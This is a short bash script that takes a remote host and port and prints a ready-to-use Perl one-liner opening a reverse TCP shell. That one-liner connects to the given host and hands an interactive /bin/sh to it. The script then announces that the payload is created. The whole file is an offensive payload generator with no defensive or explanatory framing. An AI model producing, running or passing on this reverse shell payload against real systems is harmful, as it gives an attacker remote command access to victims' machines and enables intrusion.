
#!/bin/bash

function Craft_perl_linux_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux perl reverse tcp shell\n"
                printf "Usage bash linux_perl-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

        printf "\n"
	printf "perl -e 'use Socket;\$i=\"$rhost\";\$p=$rport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"        
        printf "\n\n[\e[0;32m+\e[0m] Payload created.\n"

}

Craft_perl_linux_reverse_shell "$1" "$2"
